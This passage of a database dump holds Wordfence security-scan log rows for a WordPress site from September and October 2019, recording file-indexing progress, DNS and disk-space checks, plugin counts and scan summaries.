Wordfence to initiate scan'),(23692,1571760759.661203,2,'info','The disk has 134973.53 MB available'),(23339,1570723968.065200,1,'info','Scheduled Wordfence scan starting at Friday 11th of October 2019 12:12:48 AM'),(23693,1571760759.661906,10,'info','SUM_ENDOK:Scanning to check available disk space'),(23337,1570674389.148787,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23694,1571760759.677992,10,'info','SUM_START:Checking Web Application Firewall status'),(23336,1570674389.148240,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(23588,1571365635.346325,10,'info','SUM_PREP:Preparing a new scan.'),(23335,1570674389.146403,1,'info','-------------------'),(22566,1568909704.250380,2,'info','22475 files indexed'),(22567,1568909745.070192,2,'info','22580 files indexed'),(22565,1568909691.198150,2,'info','22038 files indexed'),(22563,1568909682.921444,2,'info','21229 files indexed'),(22564,1568909684.034292,2,'info','21538 files indexed'),(22562,1568909680.795790,2,'info','20729 files indexed'),(22560,1568909676.508215,2,'info','19729 files indexed'),(22561,1568909678.515623,2,'info','20229 files indexed'),(22559,1568909674.339663,2,'info','19229 files indexed'),(22557,1568909669.872626,2,'info','18229 files indexed'),(22558,1568909672.138782,2,'info','18729 files indexed'),(22556,1568909664.020322,2,'info','17729 files indexed'),(22554,1568909662.516475,2,'info','17191 files indexed'),(22555,1568909663.662647,2,'info','17691 files indexed'),(22553,1568909661.557001,2,'info','16691 files indexed'),(22551,1568909657.831097,2,'info','15691 files indexed'),(22552,1568909660.586117,2,'info','16191 files indexed'),(22550,1568909656.157604,2,'info','15191 files indexed'),(22548,1568909653.961546,2,'info','14191 files indexed'),(22549,1568909655.211298,2,'info','14691 files indexed'),(22547,1568909652.600530,2,'info','13691 files indexed'),(22545,1568909651.252967,2,'info','12691 files indexed'),(22546,1568909651.815960,2,'info','13191 files indexed'),(22544,1568909649.734165,2,'info','12191 files indexed'),(23648,1571502922.619152,2,'info','1602 files indexed'),(23195,1570205966.402738,2,'info','28181 files indexed'),(22691,1569032963.292211,1,'info','Quick Scan Complete. Scanned in 1 second.'),(22630,1568909954.476599,2,'info','Scanned contents of 97 additional files at 9.66 per second'),(22631,1568909955.491512,2,'info','Scanned contents of 114 additional files at 10.31 per second'),(22632,1568909956.533439,2,'info','Scanned contents of 129 additional files at 10.66 per second'),(22633,1568909957.538410,2,'info','Scanned contents of 144 additional files at 10.99 per second'),(22634,1568909963.773937,2,'info','Scanned contents of 154 additional files at 7.96 per second'),(22635,1568909964.795922,2,'info','Scanned contents of 168 additional files at 8.25 per second'),(22636,1568909965.819973,2,'info','Scanned contents of 181 additional files at 8.46 per second'),(23187,1570205903.116707,2,'info','24743 files indexed'),(23188,1570205928.074058,2,'info','24847 files indexed'),(23189,1570205944.628107,2,'info','25347 files indexed'),(23649,1571502923.056612,2,'info','2102 files indexed'),(23650,1571502924.094323,2,'info','2602 files indexed'),(23194,1570205961.665597,2,'info','27681 files indexed'),(23193,1570205950.068683,2,'info','27181 files indexed'),(23191,1570205947.243047,2,'info','26347 files indexed'),(23192,1570205948.666836,2,'info','26847 files indexed'),(23651,1571502925.155949,2,'info','3102 files indexed'),(23652,1571502925.918396,2,'info','3602 files indexed'),(23653,1571502926.441425,2,'info','4102 files indexed'),(23190,1570205945.944133,2,'info','25847 files indexed'),(23327,1570588510.252689,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23326,1570588510.218831,2,'info','Wordfence used 512 KB of memory for scan. Server peak memory usage was: 47.25 MB'),(22694,1569119135.476209,1,'info','Initiating quick scan'),(23593,1571365635.833013,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(22972,1569810321.277219,1,'info','Initiating quick scan'),(23592,1571365635.488556,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23330,1570674388.981112,1,'info','Initiating quick scan'),(22699,1569119135.590511,1,'info','-------------------'),(22700,1569119135.591684,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 43.25 MB'),(22701,1569119135.592093,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23120,1570205647.925181,2,'info','Getting theme list from WordPress'),(23121,1570205647.972441,2,'info','Found 1 themes'),(22703,1569169378.249945,1,'info','Scheduled Wordfence scan starting at Monday 23rd of September 2019 12:22:58 AM'),(23656,1571625799.782120,10,'info','SUM_PREP:Preparing a new scan.'),(23425,1570933569.839988,1,'info','-------------------'),(23426,1570933569.845846,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(23427,1570933569.846151,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23429,1570985367.709686,1,'info','Scheduled Wordfence scan starting at Monday 14th of October 2019 12:49:27 AM'),(23431,1570985373.017554,1,'info','Contacting Wordfence to initiate scan'),(23438,1570985379.880678,2,'info','Starting DNS scan for bintara.com.my'),(23439,1570985379.943564,2,'info','Scanning DNS A record for bintara.com.my'),(23440,1570985380.133971,2,'info','Scanning DNS MX record for bintara.com.my'),(23441,1570985380.138247,2,'info','Scanning DNS MX record for bintara.com.my'),(23444,1570985380.167676,2,'info','Total disk space: 498.06 GB -- Free disk space: 136.19 GB'),(23445,1570985380.168372,2,'info','The disk has 139457.33 MB available'),(23451,1570985380.330044,2,'info','Getting plugin list from WordPress'),(23217,1570329066.609709,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22877,1569551507.972879,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23773,1571883999.288987,2,'info','Wordfence used 512 KB of memory for scan. Server peak memory usage was: 46.75 MB'),(22517,1568909523.009858,2,'info','500 files indexed'),(22875,1569551507.971484,1,'info','-------------------'),(22876,1569551507.972518,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(23053,1569946470.179300,2,'info','11818 files indexed'),(23054,1569946470.879294,2,'info','12318 files indexed'),(23052,1569946468.917776,2,'info','11318 files indexed'),(23050,1569946465.533452,2,'info','10318 files indexed'),(23051,1569946468.116711,2,'info','10818 files indexed'),(23049,1569946464.879992,2,'info','9818 files indexed'),(23047,1569946460.013445,2,'info','8818 files indexed'),(23048,1569946462.851920,2,'info','9318 files indexed'),(23046,1569946449.014171,2,'info','8318 files indexed'),(23044,1569946447.238364,2,'info','7512 files indexed'),(23045,1569946447.427703,2,'info','8012 files indexed'),(23043,1569946447.072125,2,'info','7012 files indexed'),(23041,1569946444.286261,2,'info','6012 files indexed'),(23042,1569946445.837637,2,'info','6512 files indexed'),(23657,1571625799.934239,1,'info','Initiating quick scan'),(23658,1571625800.117655,10,'info','SUM_START:Checking Web Application Firewall status'),(23659,1571625800.118632,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23660,1571625800.125515,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23028,1569946320.667812,2,'info','500 files indexed'),(23029,1569946323.766929,2,'info','1000 files indexed'),(23030,1569946325.499333,2,'info','1500 files indexed'),(23031,1569946326.437547,2,'info','2000 files indexed'),(23032,1569946327.167424,2,'info','2500 files indexed'),(23033,1569946328.450451,2,'info','3000 files indexed'),(23034,1569946329.231220,2,'info','3500 files indexed'),(23035,1569946331.091837,2,'info','4000 files indexed'),(23036,1569946336.060670,2,'info','4495 files indexed'),(23037,1569946359.726197,2,'info','4506 files indexed'),(23038,1569946401.734091,2,'info','4512 files indexed'),(23039,1569946442.882832,2,'info','5012 files indexed'),(23040,1569946443.472459,2,'info','5512 files indexed'),(23083,1570069899.174592,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(22458,1568687468.198258,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22456,1568687468.195987,1,'info','-------------------'),(22457,1568687468.197733,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20.75 MB'),(22867,1569428122.009320,2,'info','8972 files indexed'),(22868,1569428122.010369,2,'info','8973 files indexed'),(23208,1570206003.079217,2,'info','34249 files indexed'),(23496,1571242273.944730,1,'info','Scheduled Wordfence scan starting at Thursday 17th of October 2019 12:11:13 AM'),(23497,1571242278.519303,10,'info','SUM_PREP:Preparing a new scan.'),(23498,1571242278.533094,1,'info','Contacting Wordfence to initiate scan'),(23499,1571242279.468813,10,'info','SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),(23500,1571242281.472574,10,'info','SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),(23501,1571242283.476165,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(23502,1571242285.494767,10,'info','SUM_START:Checking for the most secure way to get IPs'),(23055,1569946472.946512,2,'info','12818 files indexed'),(23056,1569946473.233818,2,'info','12979 files indexed'),(23057,1569946484.583546,2,'info','13479 files indexed'),(23058,1569946486.891693,2,'info','13979 files indexed'),(23059,1569946488.628596,2,'info','14479 files indexed'),(23060,1569946490.129317,2,'info','14979 files indexed'),(23061,1569946491.200495,2,'info','15479 files indexed'),(23062,1569946493.069033,2,'info','15979 files indexed'),(23063,1569946494.981096,2,'info','16479 files indexed'),(23064,1569946497.526542,2,'info','16979 files indexed'),(23065,1569946499.022459,2,'info','17327 files indexed'),(23066,1569946515.870310,2,'info','17827 files indexed'),(23067,1569946519.996623,2,'info','18327 files indexed'),(23068,1569946522.490175,2,'info','18827 files indexed'),(23069,1569946523.605107,2,'info','19327 files indexed'),(23070,1569946525.492037,2,'info','19827 files indexed'),(23071,1569946529.264778,2,'info','20192 files indexed'),(23072,1569946548.172588,2,'info','20692 files indexed'),(23073,1569946553.166323,2,'info','21192 files indexed'),(22777,1569169482.972078,2,'info','18376 files indexed'),(22776,1569169481.827519,2,'info','17876 files indexed'),(22774,1569169480.243752,2,'info','16876 files indexed'),(22775,1569169480.832097,2,'info','17376 files indexed'),(22772,1569169478.338826,2,'info','15876 files indexed'),(22773,1569169479.615362,2,'info','16376 files indexed'),(22771,1569169477.906937,2,'info','15376 files indexed'),(22769,1569169476.754621,2,'info','14376 files indexed'),(22770,1569169477.638363,2,'info','14876 files indexed'),(23153,1570205804.249925,2,'info','9436 files indexed'),(23154,1570205805.658130,2,'info','9936 files indexed'),(23155,1570205806.275493,2,'info','10436 files indexed'),(23156,1570205808.509341,2,'info','10936 files indexed'),(22719,1569169394.982832,2,'info','The disk has 147783.96 MB available'),(22718,1569169394.982381,2,'info','Total disk space: 498.06 GB -- Free disk space: 144.32 GB'),(22714,1569169394.967502,2,'info','Scanning DNS MX record for bintara.com.my'),(22715,1569169394.968198,2,'info','Scanning DNS MX record for bintara.com.my'),(23107,1570205646.497749,2,'info','Scanning DNS MX record for bintara.com.my'),(23157,1570205809.124302,2,'info','11436 files indexed'),(23158,1570205809.927910,2,'info','11936 files indexed'),(23159,1570205810.626625,2,'info','12436 files indexed'),(23160,1570205812.195238,2,'info','12936 files indexed'),(23161,1570205813.380725,2,'info','13436 files indexed'),(23162,1570205814.010669,2,'info','13630 files indexed'),(23163,1570205822.575428,2,'info','14130 files indexed'),(23164,1570205824.257995,2,'info','14630 files indexed'),(23165,1570205825.396815,2,'info','15130 files indexed'),(23166,1570205826.432130,2,'info','15630 files indexed'),(22713,1569169394.783287,2,'info','Scanning DNS A record for bintara.com.my'),(23167,1570205828.032794,2,'info','16130 files indexed'),(23168,1570205829.253578,2,'info','16630 files indexed'),(23169,1570205830.506550,2,'info','17130 files indexed'),(23170,1570205831.694649,2,'info','17630 files indexed'),(22947,1569688783.086409,2,'info','9998 files indexed'),(22945,1569688776.948088,2,'info','8998 files indexed'),(22946,1569688781.943119,2,'info','9498 files indexed'),(22471,1568860230.230173,1,'info','Initiating quick scan'),(22948,1569688783.655923,2,'info','10498 files indexed'),(22949,1569688785.639440,2,'info','10998 files indexed'),(22950,1569688786.317754,2,'info','11498 files indexed'),(22468,1568773853.722910,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22467,1568773853.722469,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20.75 MB'),(22951,1569688787.216909,2,'info','11998 files indexed'),(22466,1568773853.721281,1,'info','-------------------'),(22940,1569688765.642504,2,'info','6536 files indexed'),(22477,1568860230.440458,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20.75 MB'),(22478,1568860230.440907,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22941,1569688766.429977,2,'info','7036 files indexed'),(23182,1570205858.031103,2,'info','23137 files indexed'),(23183,1570205866.862044,2,'info','23637 files indexed'),(23184,1570205869.299640,2,'info','24137 files indexed'),(23185,1570205879.510132,2,'info','24637 files indexed'),(23186,1570205880.062881,2,'info','24728 files indexed'),(23108,1570205646.498839,2,'info','Scanning DNS MX record for bintara.com.my'),(22712,1569169394.398648,2,'info','Starting DNS scan for bintara.com.my'),(23504,1571242285.508888,10,'info','SUM_START:Scanning DNS for unauthorized changes'),(23508,1571242286.839096,2,'info','Scanning DNS MX record for bintara.com.my'),(23507,1571242286.783111,2,'info','Scanning DNS MX record for bintara.com.my'),(23111,1570205646.597878,2,'info','Total disk space: 498.06 GB -- Free disk space: 139.19 GB'),(23112,1570205646.606659,2,'info','The disk has 142526.43 MB available'),(23506,1571242286.426927,2,'info','Scanning DNS A record for bintara.com.my'),(23505,1571242285.517193,2,'info','Starting DNS scan for bintara.com.my'),(22705,1569169382.681202,1,'info','Contacting Wordfence to initiate scan'),(23181,1570205856.640488,2,'info','22740 files indexed'),(23655,1571502935.558643,2,'info','4673 files indexed'),(23654,1571502926.948348,2,'info','4602 files indexed'),(23119,1570205647.924198,2,'info','Found 34 plugins'),(23118,1570205647.641685,2,'info','Getting plugin list from WordPress'),(23503,1571242285.500837,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(23745,1571760849.093186,2,'info','15251 files indexed'),(23746,1571760849.751894,2,'info','15751 files indexed'),(23747,1571760850.357410,2,'info','16251 files indexed'),(23748,1571760851.168151,2,'info','16751 files indexed'),(23749,1571760851.966040,2,'info','17251 files indexed'),(23750,1571760853.124949,2,'info','17751 files indexed'),(23751,1571760854.021439,2,'info','18106 files indexed'),(23752,1571760860.796322,2,'info','18606 files indexed'),(23753,1571760861.384388,2,'info','19106 files indexed'),(23754,1571760862.303464,2,'info','19606 files indexed'),(23755,1571760863.510608,2,'info','20106 files indexed'),(23756,1571760864.888174,2,'info','20606 files indexed'),(23757,1571760866.706369,2,'info','21106 files indexed'),(23758,1571760868.458643,2,'info','21606 files indexed'),(23759,1571760870.074027,2,'info','22106 files indexed'),(23760,1571760871.658706,2,'info','22606 files indexed'),(23761,1571760874.043452,2,'info','23088 files indexed'),(23762,1571760880.083690,2,'info','23588 files indexed'),(23763,1571760881.498723,2,'info','24088 files indexed'),(23764,1571760883.584913,2,'info','24588 files indexed'),(23765,1571760894.010254,2,'info','24857 files indexed'),(22887,1569637585.893342,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(22885,1569637585.892139,1,'info','-------------------'),(22886,1569637585.893070,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(23487,1571192746.368322,1,'info','Initiating quick scan'),(23770,1571883999.099298,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(22880,1569637585.701454,1,'info','Initiating quick scan'),(23215,1570329066.608288,1,'info','-------------------'),(23216,1570329066.609332,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 46.75 MB'),(23482,1571106843.829570,1,'info','-------------------'),(23210,1570329066.337088,1,'info','Initiating quick scan'),(23772,1571883999.287428,1,'info','-------------------'),(23771,1571883999.282762,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23483,1571106843.831611,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(23484,1571106843.838167,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23674,1571711223.323161,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23673,1571711223.322839,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 46.75 MB'),(23672,1571711223.321839,1,'info','-------------------'),(23671,1571711223.318359,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23670,1571711223.100598,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23669,1571711223.094829,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23668,1571711223.094053,10,'info','SUM_START:Checking Web Application Firewall status'),(23376,1570723991.553285,2,'info','500 files indexed'),(23377,1570723992.009418,2,'info','567 files indexed'),(23378,1570723999.021814,2,'info','1067 files indexed'),(23379,1570723999.327007,2,'info','1567 files indexed'),(23380,1570723999.722058,2,'info','2067 files indexed'),(23381,1570724000.048808,2,'info','2567 files indexed'),(23382,1570724001.117552,2,'info','3067 files indexed'),(23383,1570724001.449129,2,'info','3567 files indexed'),(23384,1570724001.843369,2,'info','4067 files indexed'),(23385,1570724002.276820,2,'info','4567 files indexed'),(23386,1570724013.036861,2,'info','4617 files indexed'),(23387,1570724092.088592,2,'info','5117 files indexed'),(23388,1570724092.381480,2,'info','5617 files indexed'),(23389,1570724092.828610,2,'info','6117 files indexed'),(23390,1570724093.648812,2,'info','6617 files indexed'),(23391,1570724094.406202,2,'info','7117 files indexed'),(23392,1570724094.545672,2,'info','7617 files indexed'),(23393,1570724094.883382,2,'info','8117 files indexed'),(23394,1570724096.457893,2,'info','8617 files indexed'),(23395,1570724098.411326,2,'info','9117 files indexed'),(23396,1570724099.152643,2,'info','9253 files indexed'),(23397,1570724108.684601,2,'info','9753 files indexed'),(23398,1570724109.329664,2,'info','10253 files indexed'),(23399,1570724110.166835,2,'info','10753 files indexed'),(23400,1570724112.652156,2,'info','11253 files indexed'),(23401,1570724113.487186,2,'info','11753 files indexed'),(23402,1570724114.036567,2,'info','12253 files indexed'),(23403,1570724114.966121,2,'info','12753 files indexed'),(23404,1570724116.584904,2,'info','13253 files indexed'),(23405,1570724117.702292,2,'info','13753 files indexed'),(23406,1570724119.444317,2,'info','14253 files indexed'),(23407,1570724120.596643,2,'info','14753 files indexed'),(23408,1570724121.059361,2,'info','14943 files indexed'),(22780,1569169485.247570,2,'info','19876 files indexed'),(22781,1569169486.514968,2,'info','20376 files indexed'),(22782,1569169488.068845,2,'info','20876 files indexed'),(22783,1569169489.392614,2,'info','21376 files indexed'),(22784,1569169490.491133,2,'info','21876 files indexed'),(22785,1569169491.958310,2,'info','22376 files indexed'),(22413,1568650574.199527,2,'info','Scanned contents of 183 additional files at 6.45 per second'),(22412,1568650569.523437,2,'info','Scanned contents of 177 additional files at 7.47 per second'),(22411,1568650568.501316,2,'info','Scanned contents of 166 additional files at 7.32 per second'),(22406,1568650562.904424,2,'info','Scanned contents of 108 additional files at 6.33 per second'),(22407,1568650563.962443,2,'info','Scanned contents of 118 additional files at 6.51 per second'),(22408,1568650565.029498,2,'info','Scanned contents of 130 additional files at 6.77 per second'),(22409,1568650566.100359,2,'info','Scanned contents of 141 additional files at 6.96 per second'),(22410,1568650567.421805,2,'info','Scanned contents of 153 additional files at 7.09 per second'),(22414,1568650578.531500,2,'info','Scanned contents of 184 additional files at 5.63 per second'),(23171,1570205834.128049,2,'info','18130 files indexed'),(23172,1570205835.819054,2,'info','18630 files indexed'),(23173,1570205836.007507,2,'info','18740 files indexed'),(23174,1570205843.007061,2,'info','19240 files indexed'),(23175,1570205844.185581,2,'info','19740 files indexed'),(23176,1570205845.771033,2,'info','20240 files indexed'),(23177,1570205847.998020,2,'info','20740 files indexed'),(23178,1570205850.254652,2,'info','21240 files indexed'),(23179,1570205852.530296,2,'info','21740 files indexed'),(23180,1570205854.263712,2,'info','22240 files indexed'),(22502,1568909519.804068,2,'info','Getting plugin list from WordPress'),(22503,1568909519.883027,2,'info','Found 21 plugins'),(22889,1569688655.561016,1,'info','Scheduled Wordfence scan starting at Sunday 29th of September 2019 12:37:35 AM'),(23682,1571760758.889252,10,'info','SUM_START:Checking for the most secure way to get IPs'),(22891,1569688661.269884,1,'info','Contacting Wordfence to initiate scan'),(23318,1570464914.018247,2,'info','24769 files indexed'),(23317,1570464909.397636,2,'info','24764 files indexed'),(23316,1570464906.734251,2,'info','24264 files indexed'),(23315,1570464905.631518,2,'info','23764 files indexed'),(23314,1570464904.196297,2,'info','23264 files indexed'),(23148,1570205789.313433,2,'info','7067 files indexed'),(23149,1570205789.579671,2,'info','7567 files indexed'),(23150,1570205790.172042,2,'info','8067 files indexed'),(23151,1570205792.047359,2,'info','8436 files indexed'),(23152,1570205801.309114,2,'info','8936 files indexed'),(23106,1570205646.131788,2,'info','Scanning DNS A record for bintara.com.my'),(23510,1571242286.850630,10,'info','SUM_START:Scanning to check available disk space'),(23509,1571242286.840881,10,'info','SUM_ENDOK:Scanning DNS for unauthorized changes'),(23105,1570205645.895255,2,'info','Starting DNS scan for bintara.com.my'),(23511,1571242286.854661,2,'info','Total disk space: 498.06 GB -- Free disk space: 134.37 GB'),(23529,1571242291.312114,10,'info','SUM_DISABLED:Skipping theme scan'),(23530,1571242291.312924,10,'info','SUM_DISABLED:Skipping plugin scan'),(23528,1571242291.308668,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(23512,1571242286.855183,2,'info','The disk has 137596.39 MB available'),(23513,1571242286.855719,10,'info','SUM_ENDOK:Scanning to check available disk space'),(23514,1571242286.871370,10,'info','SUM_START:Checking Web Application Firewall status'),(23515,1571242286.875743,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23516,1571242286.884689,10,'info','SUM_START:Checking for future GeoIP support'),(23517,1571242286.887977,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(23518,1571242287.378358,2,'info','Getting plugin list from WordPress'),(23519,1571242287.417071,2,'info','Found 34 plugins'),(23520,1571242287.417555,2,'info','Getting theme list from WordPress'),(23521,1571242287.423449,2,'info','Found 1 themes'),(23522,1571242287.451069,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(23523,1571242289.964308,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(23524,1571242289.970161,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(23525,1571242289.974794,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(23526,1571242289.983082,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(23527,1571242291.305039,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(22568,1568909761.173221,2,'info','23080 files indexed'),(22569,1568909763.632250,2,'info','23580 files indexed'),(22570,1568909764.284197,2,'info','24080 files indexed'),(22571,1568909765.039011,2,'info','24462 files indexed'),(22572,1568909770.010936,2,'info','24962 files indexed'),(22573,1568909771.538226,2,'info','25462 files indexed'),(22574,1568909774.940120,2,'info','25962 files indexed'),(22575,1568909775.626705,2,'info','26462 files indexed'),(22576,1568909776.211865,2,'info','26962 files indexed'),(22577,1568909777.058992,2,'info','27462 files indexed'),(22578,1568909778.013426,2,'info','27962 files indexed'),(22579,1568909779.516315,2,'info','28462 files indexed'),(22580,1568909782.155660,2,'info','28962 files indexed'),(22581,1568909782.831243,2,'info','29462 files indexed'),(22582,1568909783.275332,2,'info','29962 files indexed'),(22583,1568909784.036485,2,'info','30462 files indexed'),(22584,1568909785.008932,2,'info','30828 files indexed'),(22585,1568909790.482327,2,'info','31328 files indexed'),(22586,1568909794.168703,2,'info','31828 files indexed'),(22587,1568909804.207548,2,'info','32328 files indexed'),(22588,1568909805.078753,2,'info','32336 files indexed'),(22589,1568909825.157376,2,'info','32373 files indexed'),(22590,1568909840.487216,2,'info','32873 files indexed'),(22591,1568909845.006572,2,'info','33235 files indexed'),(22592,1568909908.085053,2,'info','Analyzed 100 files containing 1.77 MB of data so far'),(22593,1568909909.800983,2,'info','Analyzed 200 files containing 2.89 MB of data so far'),(22594,1568909911.554410,2,'info','Analyzed 300 files containing 4.22 MB of data so far'),(22595,1568909913.721706,2,'info','Analyzed 400 files containing 6.51 MB of data so far'),(22596,1568909914.844346,2,'info','Analyzed 500 files containing 7.29 MB of data so far'),(22597,1568909915.840265,2,'info','Analyzed 600 files containing 8.32 MB of data so far'),(22598,1568909917.220241,2,'info','Analyzed 700 files containing 9.42 MB of data so far'),(22599,1568909918.012024,2,'info','Analyzed 800 files containing 9.95 MB of data so far'),(22600,1568909918.706127,2,'info','Analyzed 900 files containing 10.73 MB of data so far'),(22601,1568909920.467882,2,'info','Analyzed 1000 files containing 12.51 MB of data so far'),(22602,1568909921.179252,2,'info','Analyzed 1100 files containing 12.86 MB of data so far'),(22603,1568909921.570266,2,'info','Analyzed 1200 files containing 13.1 MB of data so far'),(22604,1568909922.008818,2,'info','Analyzed 1300 files containing 13.33 MB of data so far'),(22605,1568909922.690072,2,'info','Analyzed 1400 files containing 13.82 MB of data so far'),(22606,1568909925.238218,2,'info','Analyzed 1500 files containing 16 MB of data so far'),(22607,1568909928.628527,2,'info','Analyzed 1600 files containing 20.19 MB of data so far'),(22608,1568909929.061238,2,'info','Analyzed 1700 files containing 20.69 MB of data so far'),(22609,1568909929.508059,2,'info','Analyzed 1800 files containing 21.41 MB of data so far'),(22610,1568909931.104304,2,'info','Analyzed 1900 files containing 23.12 MB of data so far'),(22611,1568909933.982290,2,'info','Analyzed 2000 files containing 26.04 MB of data so far'),(22612,1568909934.753560,2,'info','Analyzed 2100 files containing 26.71 MB of data so far'),(22613,1568909936.703543,2,'info','Analyzed 2200 files containing 28.34 MB of data so far'),(22614,1568909938.176339,2,'info','Analyzed 2282 files containing 29.35 MB of data.'),(23774,1571883999.289590,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23220,1570416177.992510,1,'info','Initiating quick scan'),(23775,1571883999.290152,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(22870,1569551507.765407,1,'info','Initiating quick scan'),(23452,1570985380.409544,2,'info','Found 34 plugins'),(23453,1570985380.417239,2,'info','Getting theme list from WordPress'),(23454,1570985380.431557,2,'info','Found 1 themes'),(22622,1568909944.431520,2,'info','Starting scan of file contents'),(22623,1568909946.991081,2,'info','Scanned contents of 1 additional files at 0.39 per second'),(22624,1568909948.103696,2,'info','Scanned contents of 15 additional files at 4.09 per second'),(22625,1568909949.156620,2,'info','Scanned contents of 26 additional files at 5.51 per second'),(22626,1568909950.182987,2,'info','Scanned contents of 40 additional files at 6.96 per second'),(22627,1568909951.398811,2,'info','Scanned contents of 53 additional files at 7.61 per second'),(22628,1568909952.426938,2,'info','Scanned contents of 65 additional files at 8.13 per second'),(22629,1568909953.461449,2,'info','Scanned contents of 80 additional files at 8.86 per second'),(23683,1571760758.893795,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(23355,1570723987.807685,2,'info','The disk has 140128.54 MB available'),(23354,1570723987.806960,2,'info','Total disk space: 498.06 GB -- Free disk space: 136.84 GB'),(22495,1568909519.352792,2,'info','Total disk space: 498.06 GB -- Free disk space: 145.31 GB'),(22496,1568909519.353187,2,'info','The disk has 148794.11 MB available'),(23684,1571760758.901055,10,'info','SUM_START:Scanning DNS for unauthorized changes'),(23351,1570723987.786995,2,'info','Scanning DNS MX record for bintara.com.my'),(23350,1570723987.785645,2,'info','Scanning DNS MX record for bintara.com.my'),(23349,1570723987.766833,2,'info','Scanning DNS A record for bintara.com.my'),(23348,1570723987.377475,2,'info','Starting DNS scan for bintara.com.my'),(22898,1569688668.755444,2,'info','Starting DNS scan for bintara.com.my'),(22899,1569688669.150961,2,'info','Scanning DNS A record for bintara.com.my'),(22900,1569688669.507321,2,'info','Scanning DNS MX record for bintara.com.my'),(22901,1569688669.508068,2,'info','Scanning DNS MX record for bintara.com.my'),(23685,1571760758.903923,2,'info','Starting DNS scan for bintara.com.my'),(23686,1571760759.289430,2,'info','Scanning DNS A record for bintara.com.my'),(22904,1569688669.525003,2,'info','Total disk space: 498.06 GB -- Free disk space: 140.89 GB'),(22905,1569688669.525427,2,'info','The disk has 144268.63 MB available'),(23477,1571106843.382153,1,'info','Initiating quick scan'),(23776,1571971175.768480,10,'info','SUM_PREP:Preparing a new scan.'),(22849,1569428004.836957,2,'info','500 files indexed'),(22850,1569428005.457638,2,'info','1000 files indexed'),(22851,1569428005.824716,2,'info','1500 files indexed'),(22852,1569428006.461632,2,'info','2000 files indexed'),(22853,1569428007.015707,2,'info','2500 files indexed'),(22854,1569428007.979595,2,'info','3000 files indexed'),(22855,1569428008.539481,2,'info','3500 files indexed'),(22856,1569428009.008562,2,'info','4000 files indexed'),(22857,1569428010.954786,2,'info','4455 files indexed'),(22858,1569428032.045411,2,'info','4472 files indexed'),(22859,1569428114.441005,2,'info','4972 files indexed'),(22860,1569428114.588300,2,'info','5472 files indexed'),(22861,1569428114.909146,2,'info','5972 files indexed'),(22862,1569428115.966137,2,'info','6472 files indexed'),(22779,1569169484.349122,2,'info','19376 files indexed'),(22778,1569169483.714143,2,'info','18876 files indexed'),(23534,1571242295.073422,2,'info','663 files indexed'),(23535,1571242306.105414,2,'info','1163 files indexed'),(23533,1571242291.381382,2,'info','500 files indexed'),(22670,1568909985.186830,2,'info','Wordfence used 41.5 MB of memory for scan. Server peak memory usage was: 62.25 MB'),(22671,1568909985.187209,1,'info','Scan Complete. Scanned 2282 files, 22 plugins, 1 themes, 125 posts, 0 comments and 2412 URLs in 7 minutes 52 seconds.'),(23471,1570985395.066979,2,'info','2640 files indexed'),(22991,1569946285.546658,1,'info','Scheduled Wordfence scan starting at Wednesday 2nd of October 2019 12:11:25 AM'),(23470,1570985389.008511,2,'info','2140 files indexed'),(22993,1569946294.687285,1,'info','Contacting Wordfence to initiate scan'),(23468,1570985388.167254,2,'info','1500 files indexed'),(23469,1570985388.687669,2,'info','2000 files indexed'),(23466,1570985383.391517,2,'info','500 files indexed'),(23467,1570985387.420949,2,'info','1000 files indexed'),(23778,1571971175.999290,10,'info','SUM_START:Checking Web Application Firewall status'),(23779,1571971176.023061,10,'info','SUM_ENDOK:Checking Web Application 